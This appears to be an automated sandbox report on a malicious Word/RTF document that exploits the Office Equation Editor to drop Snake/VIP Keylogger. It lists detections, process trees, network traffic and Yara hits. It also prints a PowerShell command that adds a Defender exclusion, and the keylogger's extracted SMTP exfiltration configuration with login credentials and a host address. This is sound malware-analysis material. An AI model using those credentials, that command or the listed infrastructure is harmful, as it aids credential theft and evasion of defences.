Windows Analysis Report
na.doc

Overview

General Information

Sample name: na.doc
Analysis ID: 1545180
MD5: 657e7d38172b5294be8ff81a94efe745
SHA1: e00cce89c60742889474451b7306ac6bd3c80430
SHA256: 89054ad8d24c60063c31b9c2deede4c43b6a6a84da9f657b3450a4c2346c03e3
Tags: doc, user-abuse_ch

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3168 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3256 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • cdlpohayugo39567.exe (PID: 3424 cmdline: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe" MD5: 879B4E39A671B826E59EE54A75714CC7)
        • powershell.exe (PID: 3504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • cdlpohayugo39567.exe (PID: 3512 cmdline: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe" MD5: 879B4E39A671B826E59EE54A75714CC7)
    • EQNEDT32.EXE (PID: 3764 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "yugolog@falconcables.info", "Password": "7213575aceACE@@  ", "Host": "185.198.59.26", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "yugolog@falconcables.info", "Password": "7213575aceACE@@  ", "Host": "185.198.59.26", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
na.doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen |
  • 0xe64a2:$obj2: \objdata
  • 0xe64bf:$obj3: \objupdate

Source | Rule | Description | Author | Strings
00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
  • 0x2daa0:$a1: get_encryptedPassword
  • 0x2e028:$a2: get_encryptedUsername
  • 0x2d713:$a3: get_timePasswordChanged
  • 0x2d82a:$a4: get_passwordField
  • 0x2dab6:$a5: set_encryptedPassword
  • 0x307d2:$a6: get_passwords
  • 0x30b66:$a7: get_logins
  • 0x307be:$a8: GetOutlookPasswords
  • 0x30177:$a9: StartKeylogger
  • 0x30abf:$a10: KeyLoggerEventArgs
  • 0x30217:$a11: KeyLoggerEventArgsEventHandler
00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |

Source | Rule | Description | Author | Strings
7.2.cdlpohayugo39567.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
7.2.cdlpohayugo39567.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
7.2.cdlpohayugo39567.exe.400000.0.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
7.2.cdlpohayugo39567.exe.400000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
7.2.cdlpohayugo39567.exe.400000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
  • 0x2dca0:$a1: get_encryptedPassword
  • 0x2e228:$a2: get_encryptedUsername
  • 0x2d913:$a3: get_timePasswordChanged
  • 0x2da2a:$a4: get_passwordField
  • 0x2dcb6:$a5: set_encryptedPassword
  • 0x309d2:$a6: get_passwords
  • 0x30d66:$a7: get_logins
  • 0x309be:$a8: GetOutlookPasswords
  • 0x30377:$a9: StartKeylogger
  • 0x30cbf:$a10: KeyLoggerEventArgs
  • 0x30417:$a11: KeyLoggerEventArgsEventHandler

Exploits

Source: Network Connection | Author: Joe Security | Data: DestinationIp: 87.120.84.38, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3256, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3256, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\qHbynE8Vgwabsy3[1].exe

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3256, Protocol: tcp, SourceIp: 87.120.84.38, SourceIsIpv6: false, SourcePort: 80
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", ParentImage: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, ParentProcessId: 3424, ParentProcessName: cdlpohayugo39567.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", ProcessId: 3504, ProcessName: powershell.exe
                  Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", CommandLine: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, NewProcessName: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, OriginalFileName: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3256, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", ProcessId: 3424, ProcessName: cdlpohayugo39567.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", CommandLine: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, NewProcessName: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, OriginalFileName: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3256, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", ProcessId: 3424, ProcessName: cdlpohayugo39567.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", ParentImage: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, ParentProcessId: 3424, ParentProcessName: cdlpohayugo39567.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", ProcessId: 3504, ProcessName: powershell.exe
                  Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, QueryName: checkip.dyndns.org
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3256, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", ParentImage: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, ParentProcessId: 3424, ParentProcessName: cdlpohayugo39567.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe", ProcessId: 3504, ProcessName: powershell.exe
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3168, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3504, TargetFilename: C:\Users\user\AppData\Local\Temp\rt4c5fsc.rny.ps1
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-30T08:19:41.177030+0100 | 2022050 | 1 | A Network Trojan was detected | 87.120.84.38 | 80 | 192.168.2.22 | 49161 | TCP
2024-10-30T08:19:41.359672+0100 | 2022051 | 1 | A Network Trojan was detected | 87.120.84.38 | 80 | 192.168.2.22 | 49161 | TCP
2024-10-30T08:19:50.707109+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.22 | 49164 | 188.114.96.3 | 443 | TCP
2024-10-30T08:19:55.083249+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.22 | 49168 | 188.114.97.3 | 443 | TCP
2024-10-30T08:19:56.949439+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.22 | 49170 | 188.114.97.3 | 443 | TCP
2024-10-30T08:19:58.455619+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.22 | 49172 | 188.114.96.3 | 443 | TCP
2024-10-30T08:20:15.045474+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.22 | 49179 | 188.114.96.3 | 443 | TCP
2024-10-30T08:19:47.874537+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49162 | 132.226.8.169 | 80 | TCP
2024-10-30T08:19:50.122483+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49162 | 132.226.8.169 | 80 | TCP
2024-10-30T08:19:52.660592+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49165 | 132.226.8.169 | 80 | TCP
2024-10-30T08:19:54.501299+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49167 | 132.226.8.169 | 80 | TCP

AV Detection

Source: na.doc | Avira: detected
Source: 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "yugolog@falconcables.info", "Password": "7213575aceACE@@ ", "Host": "185.198.59.26", "Port": "587", "Version": "4.4"}
Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "yugolog@falconcables.info", "Password": "7213575aceACE@@ ", "Host": "185.198.59.26", "Port": "587"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\qHbynE8Vgwabsy3[1].exe | ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe | ReversingLabs: Detection: 66%
Source: na.doc | ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\qHbynE8Vgwabsy3[1].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 87.120.84.38 Port: 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49180 version: TLS 1.2
                  Source: Binary string: vqar.pdb source: EQNEDT32.EXE, 00000002.00000003.403025619.000000000063D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.403029344.0000000000621000.00000004.00000020.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000005.00000000.402963037.0000000000E82000.00000020.00000001.01000000.00000004.sdmp, qHbynE8Vgwabsy3[1].exe.2.dr, cdlpohayugo39567.exe.2.dr
                  Source: Binary string: vqar.pdbSHA256 source: EQNEDT32.EXE, 00000002.00000003.403025619.000000000063D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.403029344.0000000000621000.00000004.00000020.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000005.00000000.402963037.0000000000E82000.00000020.00000001.01000000.00000004.sdmp, qHbynE8Vgwabsy3[1].exe.2.dr, cdlpohayugo39567.exe.2.dr

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F48D1h7_2_006F4628
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FC2C9h7_2_006FC020
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F3BC9h7_2_006F3920
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F62E1h7_2_006F6038
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FDCD9h7_2_006FDA30
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F92A9h7_2_006F9000
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FB5C1h7_2_006FB318
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FF0E1h7_2_006FEE10
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F6B91h7_2_006F68E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F5E89h7_2_006F5BE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FE7B1h7_2_006FE4E0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F85A1h7_2_006F82F8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F7899h7_2_006F75F0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FBE71h7_2_006FBBC8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F3771h7_2_006F34C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FB169h7_2_006FAEC0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F5181h7_2_006F4ED8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FD881h7_2_006FD5D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FCB7Bh7_2_006FC8D0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F4479h7_2_006F41D0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FF579h7_2_006FF2A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F8E51h7_2_006F8BA8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F8149h7_2_006F7EA0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F9B59h7_2_006F98B0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F5A31h7_2_006F5788
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FE1C5h7_2_006FDE88
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006FD429h7_2_006FD180
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F4D29h7_2_006F4A80
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F7441h7_2_006F7198
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then jmp 006F6739h7_2_006F6490
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_00765F38
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_00765F28
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_00762E16
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_00762B00
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_00762AF2
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: api.telegram.org
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 158.101.44.242:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 193.122.130.0:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 132.226.247.73:80
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 193.122.130.0:80
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 193.122.6.168:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
